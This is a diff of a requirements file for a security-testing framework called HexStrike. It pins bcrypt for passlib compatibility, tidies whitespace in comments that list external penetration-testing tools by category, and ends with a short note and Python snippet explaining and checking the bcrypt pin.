+bcrypt==4.0.1                     # Pin bcrypt version for passlib compatibility (fixes pwntools dependency issue)
 
 # ============================================================================
 # EXTERNAL SECURITY TOOLS (150+ Tools - Install separately)
 # ============================================================================
-# 
+#
 # HexStrike v6.0 integrates with 150+ external security tools that must be
 # installed separately from their official sources:
-# 
+#
 # ๐Ÿ” Network & Reconnaissance (25+ tools):
 #   - nmap, masscan, rustscan, autorecon, amass, subfinder, fierce
 #   - dnsenum, theharvester, responder, netexec, enum4linux-ng
-# 
+#
 # ๐ŸŒ Web Application Security (40+ tools):
 #   - gobuster, feroxbuster, ffuf, dirb, dirsearch, nuclei, nikto
 #   - sqlmap, wpscan, arjun, paramspider, x8, katana, httpx
 #   - dalfox, jaeles, hakrawler, gau, waybackurls, wafw00f
-# 
+#
 # ๐Ÿ” Authentication & Password (12+ tools):
 #   - hydra, john, hashcat, medusa, patator, netexec
 #   - evil-winrm, hash-identifier, ophcrack
-# 
+#
 # ๐Ÿ”ฌ Binary Analysis & Reverse Engineering (25+ tools):
 #   - ghidra, radare2, gdb, binwalk, ropgadget, checksec, strings
 #   - volatility3, foremost, steghide, exiftool, angr, pwntools
-# 
+#
 # โ˜๏ธ Cloud & Container Security (20+ tools):
 #   - prowler, scout-suite, trivy, kube-hunter, kube-bench
 #   - docker-bench-security, checkov, terrascan, falco
-# 
+#
 # ๐Ÿ† CTF & Forensics (20+ tools):
 #   - volatility3, autopsy, sleuthkit, stegsolve, zsteg, outguess
 #   - photorec, testdisk, scalpel, bulk-extractor
-# 
+#
 # ๐Ÿ•ต๏ธ OSINT & Intelligence (20+ tools):
 #   - sherlock, social-analyzer, recon-ng, maltego, spiderfoot
 #   - shodan-cli, censys-cli, have-i-been-pwned
-# 
+#
 # Installation Notes:
 # 1. Kali Linux 2024.1+ includes most tools by default
 # 2. Ubuntu/Debian users should install tools from official repositories
 # 3. Some tools require compilation from source or additional setup
 # 4. Cloud tools require API keys and authentication configuration
 # 5. Browser Agent requires Chrome/Chromium and ChromeDriver installation
-# 
-# For complete installation instructions and setup guides, see README.md
\ No newline at end of file
+#
+# For complete installation instructions and setup guides, see README.md
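A closing note on the new `bcrypt==4.0.1` pin: passlib 1.7.4 detects its bcrypt backend through the `bcrypt.__about__.__version__` attribute, which bcrypt removed in the 4.1 series, and that appears to be the breakage the inline comment alludes to. A quick post-install sanity check, offered as a sketch rather than anything shipped with the project:

```python
# Verifies the environment matches the pin's intent: bcrypt 4.0.x still
# exposes __about__, the attribute passlib 1.7.4 reads; 4.1+ dropped it.
import bcrypt

about = getattr(bcrypt, "__about__", None)
if about is not None:
    print(f"bcrypt {about.__version__}: compatible with passlib version detection")
else:
    # On bcrypt >= 4.1 the version string lives on bcrypt.__version__ instead
    print(f"bcrypt {bcrypt.__version__}: passlib may fail to read its version")
```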